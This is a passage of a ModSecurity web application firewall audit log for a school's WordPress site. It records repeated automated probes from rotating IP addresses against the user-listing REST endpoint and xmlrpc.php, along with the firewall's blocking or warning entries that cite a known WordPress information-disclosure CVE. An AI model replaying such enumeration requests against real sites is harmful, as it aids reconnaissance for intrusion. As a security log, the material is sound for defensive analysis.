"17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424779751039 4984 (- - -) Stopwatch2: 1747424779751039 4984; combined=3786, p1=467, p2=3114, p3=22, p4=24, p5=92, sr=88, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76afae5f-Z-- --95cff11f-A-- [17/May/2025:02:47:07 +0700] aCeWO9hEtho3ciA0wehd9wAAAJg 103.236.140.4 54246 103.236.140.4 8181 --95cff11f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --95cff11f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95cff11f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424827981150 3148 (- - -) Stopwatch2: 1747424827981150 3148; combined=1335, p1=461, p2=843, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95cff11f-Z-- --87fcb267-A-- [17/May/2025:02:47:15 +0700] aCeWQ8e47ocjCGWTS4Y-_QAAAFc 103.236.140.4 54250 103.236.140.4 8181 --87fcb267-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --87fcb267-C-- demo.sayHello --87fcb267-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --87fcb267-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424835046461 6817 (- - -) Stopwatch2: 1747424835046461 6817; combined=4779, p1=608, p2=3925, p3=41, p4=39, p5=98, sr=81, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87fcb267-Z-- --e0a12e1f-A-- [17/May/2025:02:47:51 +0700] aCeWZ8e47ocjCGWTS4Y-_gAAAEA 103.236.140.4 54254 103.236.140.4 8181 --e0a12e1f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0a12e1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0a12e1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424871855409 2827 (- - -) Stopwatch2: 1747424871855409 2827; combined=1264, p1=428, p2=807, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0a12e1f-Z-- --88804e07-A-- [17/May/2025:02:47:59 +0700] aCeWb9hEtho3ciA0wehd-gAAAIU 103.236.140.4 54258 103.236.140.4 8181 --88804e07-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.56 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --88804e07-C-- demo.sayHello --88804e07-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --88804e07-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424879719714 5801 (- - -) Stopwatch2: 1747424879719714 5801; combined=4253, p1=552, p2=3469, p3=34, p4=38, p5=95, sr=72, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88804e07-Z-- --4e213178-A-- [17/May/2025:02:48:03 +0700] aCeWc9hEtho3ciA0wehd_AAAAIk 103.236.140.4 54262 103.236.140.4 8181 --4e213178-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4e213178-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e213178-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424883156331 2256 (- - -) Stopwatch2: 1747424883156331 2256; combined=990, p1=323, p2=635, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e213178-Z-- --6b707d75-A-- [17/May/2025:02:48:11 +0700] aCeWe9hEtho3ciA0wehd_gAAAIo 103.236.140.4 54266 103.236.140.4 8181 --6b707d75-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6b707d75-C-- demo.sayHello --6b707d75-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b707d75-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424891029732 4913 (- - -) Stopwatch2: 1747424891029732 4913; combined=3281, p1=481, p2=2625, p3=30, p4=31, p5=68, sr=56, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b707d75-Z-- --2e494c57-A-- [17/May/2025:02:49:05 +0700] aCeWsce47ocjCGWTS4Y_AQAAAEg 103.236.140.4 54282 103.236.140.4 8181 --2e494c57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2e494c57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e494c57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424945180601 2889 (- - -) Stopwatch2: 1747424945180601 2889; combined=1360, p1=451, p2=879, p3=0, p4=0, p5=30, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e494c57-Z-- --12963345-A-- [17/May/2025:02:49:10 +0700] aCeWtthEtho3ciA0weheBAAAAJQ 103.236.140.4 54286 103.236.140.4 8181 --12963345-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --12963345-C-- demo.sayHello --12963345-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --12963345-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424950279817 6038 (- - -) Stopwatch2: 1747424950279817 6038; combined=4348, p1=585, p2=3528, p3=33, p4=38, p5=96, sr=80, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12963345-Z-- --2e679208-A-- [17/May/2025:02:49:27 +0700] aCeWx9hEtho3ciA0weheBQAAAJY 103.236.140.4 54290 103.236.140.4 8181 --2e679208-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2e679208-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e679208-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424967272824 3684 (- - -) Stopwatch2: 1747424967272824 3684; combined=1441, p1=493, p2=903, p3=0, p4=0, p5=45, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e679208-Z-- --2bda211d-A-- [17/May/2025:02:49:31 +0700] aCeWy0E0LfP59mkCzg41_AAAAMs 103.236.140.4 54294 103.236.140.4 8181 --2bda211d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.23 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2bda211d-C-- demo.sayHello --2bda211d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bda211d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424971032364 5822 (- - -) Stopwatch2: 1747424971032364 5822; combined=4233, p1=540, p2=3470, p3=28, p4=31, p5=96, sr=86, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bda211d-Z-- --48c6295a-A-- [17/May/2025:02:49:50 +0700] aCeW3thEtho3ciA0weheCAAAAIA 103.236.140.4 54298 103.236.140.4 8181 --48c6295a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.135 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --48c6295a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48c6295a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424990083934 3077 (- - -) Stopwatch2: 1747424990083934 3077; combined=1337, p1=448, p2=859, p3=0, p4=0, p5=30, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48c6295a-Z-- --11100865-A-- [17/May/2025:02:49:56 +0700] aCeW5EE0LfP59mkCzg41_QAAANM 103.236.140.4 54302 103.236.140.4 8181 --11100865-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.135 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --11100865-C-- demo.sayHello --11100865-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --11100865-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424996289301 5625 (- - -) Stopwatch2: 1747424996289301 5625; combined=4167, p1=552, p2=3391, p3=33, p4=37, p5=92, sr=78, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11100865-Z-- --06d5cd13-A-- [17/May/2025:02:50:18 +0700] aCeW-thEtho3ciA0weheDgAAAJE 103.236.140.4 54314 103.236.140.4 8181 --06d5cd13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --06d5cd13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --06d5cd13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425018306855 2919 (- - -) Stopwatch2: 1747425018306855 2919; combined=1292, p1=448, p2=817, p3=0, p4=0, p5=27, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06d5cd13-Z-- --21762062-A-- [17/May/2025:02:50:23 +0700] aCeW_9hEtho3ciA0weheEQAAAI8 103.236.140.4 54322 103.236.140.4 8181 --21762062-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.76 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --21762062-C-- demo.sayHello --21762062-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --21762062-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425023126904 5061 (- - -) Stopwatch2: 1747425023126904 5061; combined=3862, p1=493, p2=3156, p3=30, p4=32, p5=90, sr=68, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21762062-Z-- --795d5e10-A-- [17/May/2025:02:50:24 +0700] aCeXAMe47ocjCGWTS4Y_AwAAAEs 103.236.140.4 54324 103.236.140.4 8181 --795d5e10-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --795d5e10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --795d5e10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425024284618 2438 (- - -) Stopwatch2: 1747425024284618 2438; combined=1163, p1=471, p2=663, p3=0, p4=0, p5=28, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --795d5e10-Z-- --0d292c14-A-- [17/May/2025:02:50:29 +0700] aCeXBdhEtho3ciA0weheEwAAAIE 103.236.140.4 54330 103.236.140.4 8181 --0d292c14-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0d292c14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d292c14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425029275677 1961 (- - -) Stopwatch2: 1747425029275677 1961; combined=948, p1=317, p2=602, p3=0, p4=0, p5=28, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
